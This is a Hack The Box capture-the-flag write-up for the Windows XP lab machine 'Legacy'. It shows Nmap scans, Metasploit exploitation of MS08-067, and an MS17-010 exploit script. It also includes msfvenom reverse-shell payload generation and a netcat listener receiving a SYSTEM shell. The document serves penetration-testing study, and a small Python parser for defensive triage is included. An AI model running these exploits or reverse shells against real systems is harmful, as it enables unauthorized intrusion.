Hack The Box Write-Up: Legacy


Reconnaissance: Portscan with Nmap

As always, we start with a port scan using Nmap to enumerate open ports and service versions. For those who want to know more about Nmap’s commands and options, refer to my Nmap Cheatsheet:

nmap -sC -sV -oA legacy 10.10.10.4

-sC: default script scan
-sV: service version detection against open ports
-oA: output in the three major formats at once

root@kali:~/Desktop/htb/legacy# nmap -sC -sV -oA legacy 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:22 EDT
Nmap scan report for 10.10.10.4
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m47s, deviation: 2h07m16s, median: 4d23h00m47s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:9c:4d (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-05-08T18:23:37+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

The Nmap scan results show:

PORT      SERVICE        VERSION
139/tcp   netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   microsoft-ds   Windows XP microsoft-ds
3389/tcp  ms-wbt-server

Next, we run Nmap’s vulnerability scripts against the two open SMB ports (note the -n flag; in the transcript below it was typed as a bare “n”, which is why Nmap reports “Failed to resolve "n"”):

nmap -p 139,445 --script vuln -Pn -n 10.10.10.4

-p <port ranges>: Set destination port(s)
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
-Pn: Treat all hosts as online -- skip host discovery
-n: Do not resolve hostnames via DNS

root@kali:~/Desktop/htb/legacy# nmap -p 139,445 --script vuln -Pn n 10.10.10.4 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:34 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Failed to resolve "n".
Nmap scan report for 10.10.10.4
Host is up (0.27s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

From the result above, the target appears vulnerable to both MS08-067 (exploited by the Conficker worm) and MS17-010 (made famous by WannaCry). Note also that SMB message signing is disabled (“dangerous, but default” on this OS), so the host cannot detect tampered SMB traffic.
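As an added example that is not part of the original write-up, here is a small Python parser that turns the Nmap “smb-vuln-*” host-script block above into findings a defender can triage in bulk (for example, across many -oN outputs). The sample input is a constructed excerpt of the output shown on this page; the function names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed excerpt modelled on the Nmap host-script output in this write-up.
NMAP_OUTPUT = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

# "| smb-vuln-ms08-067: " starts a multi-line result; "|_smb-vuln-ms10-054: false" is single-line.
SCRIPT_HEADER = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")
STATE_LINE = re.compile(r"^\|\s+State:\s+(.*)$")
CVE_LINE = re.compile(r"^\|\s+IDs:\s+CVE:(CVE-\d{4}-\d+)")


def parse_smb_vuln(output: str) -> Dict[str, Dict[str, Optional[str]]]:
    """Map each smb-vuln-* script name to its reported state and CVE (if any)."""
    findings: Dict[str, Dict[str, Optional[str]]] = {}
    current = None
    for line in output.splitlines():
        m = SCRIPT_HEADER.match(line)
        if m:
            current, inline = m.group(1), m.group(2).strip()
            # Single-line results ("false", "ERROR: ...") carry their state inline.
            findings[current] = {"state": inline or None, "cve": None}
            continue
        if current is None:
            continue
        if (m := STATE_LINE.match(line)):
            findings[current]["state"] = m.group(1).strip()
        elif (m := CVE_LINE.match(line)):
            findings[current]["cve"] = m.group(1)
    return findings


def vulnerable_scripts(findings: Dict[str, Dict[str, Optional[str]]]) -> List[str]:
    """Scripts whose state is VULNERABLE or LIKELY VULNERABLE, sorted by name."""
    return sorted(n for n, f in findings.items()
                  if f["state"] and "VULNERABLE" in f["state"].upper())
```

Scripts that report “false” or an ERROR are kept in the dictionary so a failed check is visible as a gap rather than silently counted as clean.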

Exploit: MS08-067 with Metasploit

First things first, we execute “search ms08-067” in msfconsole to find matching exploit modules.

msf > search ms08-067

msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

We’ll use the module “exploit/windows/smb/ms08_067_netapi” from the result and run it after setting the required options.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.21
msf exploit(windows/smb/ms08_067_netapi) > run

The exploit succeeds and we get a shell running as “NT AUTHORITY\SYSTEM”:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The following information on the target can be checked with the commands “sysinfo” (Meterpreter) and “systeminfo” (Windows shell):
– OS: Microsoft Windows XP Professional
– OS Version: 5.1.2600 Service Pack 3 Build 2600
– Architecture: x86
– Hotfix: Q147222
– Original Install Date: 16/3/2017, 7:32:23

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 LEGACY
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          user
Registered Organization:   HTB
Product ID:                55274-643-7213323-23904
Original Install Date:     16/3/2017, 7:32:23
System Up Time:            0 Days, 0 Hours, 2 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 366 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.998 MB
Virtual Memory: In Use:    50 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.4

Exploit: MS17-010

We will also show how to compromise the target with another exploit, MS17-010, using the Python script “send_and_execute.py” for XP machines from helviojunior’s MS17-010 repository:

git clone https://github.com/helviojunior/MS17-010

This Python script requires a reverse-shell payload that is executed once the exploit succeeds. So, let’s create the stageless payload “windows/shell_reverse_tcp”, named “shell.exe”, with Msfvenom. If you are not familiar with Msfvenom’s command options, see below:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe

-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-o, --out: Save the payload

root@kali:~/Desktop/htb/legacy# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

After the payload is created, run the script “send_and_execute.py” with the target IP and the path to the payload specified:

python send_and_execute.py 10.10.10.4 ../shell.exe

root@kali:~/Desktop/htb/legacy/MS17-010# python send_and_execute.py 10.10.10.4 ../shell.exe 
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81f38570
SESSION: 0xe20e4830
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21c03f8
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21c0498
overwriting token UserAndGroups
Sending file KE7D5J.exe...
Opening SVCManager on 10.10.10.4.....
Creating service SFNP.....
Starting service SFNP.....
The NETBIOS connection with the remote host timed out.
Removing service SFNP.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

We get a shell on the Netcat listener started beforehand, but it turns out that whoami.exe, which we would use to check the current user, is not present on the target.

root@kali:~/Desktop/htb/legacy# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.4] 1034
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

What we can do here is launch smbserver.py (from Impacket) on our attacking machine to share whoami.exe with the target under the share name “share”.

root@kali:~/Desktop/htb/legacy# ls
impacket  ms08-067.py  MS17-010  shell.exe  smbserver.py  whoami.exe
root@kali:~/Desktop/htb/legacy# python smbserver.py share .

On the target, copy whoami.exe from the share to the current folder and run it:

C:\WINDOWS\system32>copy \\10.10.14.21\share\whoami.exe .
copy \\10.10.14.21\share\whoami.exe .
        1 file(s) copied.

C:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM
